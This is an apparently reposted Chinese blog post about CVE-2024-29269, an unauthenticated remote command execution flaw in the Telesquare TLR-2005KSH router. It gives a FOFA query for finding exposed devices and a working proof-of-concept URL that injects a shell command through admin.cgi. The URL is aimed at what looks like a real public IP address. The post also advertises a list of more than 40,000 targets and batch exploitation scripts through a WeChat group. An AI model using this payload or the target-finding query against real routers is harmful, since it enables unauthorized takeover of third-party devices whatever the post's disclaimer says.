【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

admin 2024年4月11日15:02:30评论67 views字数 536阅读1分47秒阅读模式
PART.01
免责声明

道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

PART.02
漏洞描述

Telesquare TLR-2005KSH 未授权远程命令执行漏洞

PART.03
fofa搜索语句

app="TELESQUARE-TLR-2005KSH"

PART.04
影响版本

Telesquare TLR-2005KSH

PART.05
漏洞复现

【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

POC:

http://27.174.74.70:8087/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig

【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

添加运营微信回复加群获取国外目标及批量验证脚本

【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

群内不定期更新各种POC

【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

本工具或文章来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!

原文始发于微信公众号(道一安全):【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月11日15:02:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【最新漏洞|附4W+目标】某国外路由器未授权远程代码执行漏洞 CVE-2024-29269https://cn-sec.com/archives/2647435.html

发表评论

匿名网友 填写信息